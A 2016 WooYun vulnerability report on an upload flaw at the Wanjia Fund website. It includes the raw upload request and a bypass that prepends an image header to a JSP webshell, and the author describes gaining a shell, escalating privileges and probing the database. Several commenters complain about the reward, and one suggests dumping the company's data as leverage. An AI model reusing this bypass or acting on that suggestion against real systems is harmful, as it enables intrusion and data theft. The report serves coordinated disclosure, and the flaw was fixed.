当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0195166

漏洞标题:万家基金主站某处限制不严格可导致Getshell并被提权涉及大量数据备份

相关厂商:万家基金管理有限公司

漏洞作者: 路人甲

提交时间:2016-04-12 10:17

修复时间:2016-05-28 09:10

公开时间:2016-05-28 09:10

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-12: 细节已通知厂商并且等待厂商处理中
2016-04-13: 厂商已经确认,细节仅向厂商公开
2016-04-23: 细节向核心白帽子及相关领域专家公开
2016-05-03: 细节向普通白帽子公开
2016-05-13: 细节向实习白帽子公开
2016-05-28: 细节向公众公开

简要描述:

万家基金管理有限公司,原名为天同基金管理有限公司,于2002年8月23日正式成立。2006年2月20日正式更名为万家基金管理有限公司。万家基金管理有限公司严格遵守基金合同,运作透明规范,以为百姓提供高水准的理财服务为经营目标,以对投资者的不同需求提供差异化服务为动力,在投资组合管理、定量分析以及风险控制方面追求高专业水准,是一家独具特色、并基于特色全面发展的基金管理公司。

详细说明:

POST /wanjia-web/json/space!uploadPic HTTP/1.1
Host: www.wjasset.com
Content-Length: 1791
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://www.wjasset.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiI1rj73hcvB0goeL
Referer: http://www.wjasset.com/wanjia-web/space/space!setting
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=PjhRXLVbVLdw7DNNrp8TQ8bJg43yQsyFCLsyrmtgLGPpX32NfHRJ!-1752546237; WEB_SAFETOKEN=056b1ccf24e241409c8f25afd1e008a8; _ga=GA1.2.1620914724.1460375284; Hm_lvt_8e02827b20affe2b0f7287160d3cf8d6=1460375284; Hm_lpvt_8e02827b20affe2b0f7287160d3cf8d6=1460379677; __utma=215363665.1620914724.1460375284.1460375285.1460379224.2; __utmb=215363665.7.10.1460379224; __utmc=215363665; __utmz=215363665.1460375285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Connection: close
------WebKitFormBoundaryiI1rj73hcvB0goeL
Content-Disposition: form-data; name="websiteuserBean.nickName"
鍛靛懙
------WebKitFormBoundaryiI1rj73hcvB0goeL
Content-Disposition: form-data; name="myFile"; filename="QQ鎴浘20160411195925.png"
Content-Type: image/png
塒NG
   
IHDR  \   L   !?  IDATx滍?? ?揽g滥时DA}
 >穅 鼌?D b? ??.@膒"?1\€堘D b? ??.@膒"?1\€堘D b? ??.@膒"?1\€堘D b? ??.@膒"?1\€堘D b? ??.@膒"?1\€堘D b? ??.@膒"?1\€堘D b? ??.@膒"?1\€堘D b? ??.@膒"?1\€堘D b? ??.@膒"?1\€堘D r z?攋#
?    IEND瓸`?
------WebKitFormBoundaryiI1rj73hcvB0goeL
Content-Disposition: form-data; name="pic_x"
0
------WebKitFormBoundaryiI1rj73hcvB0goeL
Content-Disposition: form-data; name="pic_y"
0
------WebKitFormBoundaryiI1rj73hcvB0goeL
Content-Disposition: form-data; name="pic_w"
100
------WebKitFormBoundaryiI1rj73hcvB0goeL
Content-Disposition: form-data; name="pic_h"
100
------WebKitFormBoundaryiI1rj73hcvB0goeL
Content-Disposition: form-data; name="previewWidth"
100
------WebKitFormBoundaryiI1rj73hcvB0goeL
Content-Disposition: form-data; name="websiteuserBean.philosophy"
dasda鏄?
------WebKitFormBoundaryiI1rj73hcvB0goeL
Content-Disposition: form-data; name="experience"
鏃犵粡楠?
------WebKitFormBoundaryiI1rj73hcvB0goeL
Content-Disposition: form-data; name="variety"
鍋忚偂鍩洪噾
------WebKitFormBoundaryiI1rj73hcvB0goeL
Content-Disposition: form-data; name="purpose"
澧炲€?
------WebKitFormBoundaryiI1rj73hcvB0goeL
Content-Disposition: form-data; name="deadline"
鐭湡
------WebKitFormBoundaryiI1rj73hcvB0goeL
Content-Disposition: form-data; name="websiteuserBean.privateLetter"
0
------WebKitFormBoundaryiI1rj73hcvB0goeL--


这里限制有点奇葩 

Content-Disposition: form-data; name="myFile"; filename="QQ截图20160411195925.png"
Content-Type: image/png


这可以jsp上传可以成功 但是如果把图片内容删除就会失败 说是不是图片格式 估计验证了图片头 添加图片头 把jsp马写到下面就成功了
危害看图片

漏洞证明:

1.png

2.png

3.png

4.png

5.png

6.png

7.png


连接数据库总连接报错 乱输入数据库密码则返回密码失败 说明数据库是真的 我卡得连不上
其次有个admin用户 如果不是自己公司建的 那么说明有前辈来过了

修复方案:

验证上传的数据 后缀

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2016-04-13 09:02

厂商回复:

已安排人员进行处理,谢谢作者的建议。

最新状态:

2016-04-22:该问题已修复,感谢乌云网,感谢作者。

漏洞评价:

评价

  1. 2016-04-13 10:58 | JiuShao ( 普通白帽子 | Rank:493 漏洞数:107 | ╮(╯▽╰)╭锄禾日当午)

    @万家基金管理有限公司 我也是醉了,getshell了 提权了,就给一分,真无良,

  2. 2016-04-13 11:05 | Taro ( 普通白帽子 | Rank:329 漏洞数:81 | 走向最远的方向,哪怕前路迷茫;抱着最大的...)

    @疯狗这种厂商wooyun要严控啊

  3. 2016-04-13 21:25 | 苦咖啡 ( 实习白帽子 | Rank:63 漏洞数:14 | 我就一菜逼,来看大牛装逼的)

    要脱他裤子 他就不会出现这种无良的情况了!!~手握裤子你说了算

  4. 2016-04-22 14:19 | 万家基金管理有限公司(乌云厂商)

    楼上三位仁兄见谅,以三位高见,这种情况应该给几分?谢谢赐教!

  5. 2016-04-22 14:25 | Taro ( 普通白帽子 | Rank:329 漏洞数:81 | 走向最远的方向,哪怕前路迷茫;抱着最大的...)

    @万家基金管理有限公司 你去参考一下其它的基金公司对于这种情况怎么处理,或者询问一下wooyun的官方该给多少rank,个人觉得少说也要10rank吧

  6. 2016-04-22 14:45 | 万家基金管理有限公司(乌云厂商)

    @Taro 谢谢兄台高见,受教了。以后会多多注意的。

  7. 2016-04-22 15:20 | JiuShao ( 普通白帽子 | Rank:493 漏洞数:107 | ╮(╯▽╰)╭锄禾日当午)

    @万家基金管理有限公司 快来补个礼物安慰一下受伤的心灵。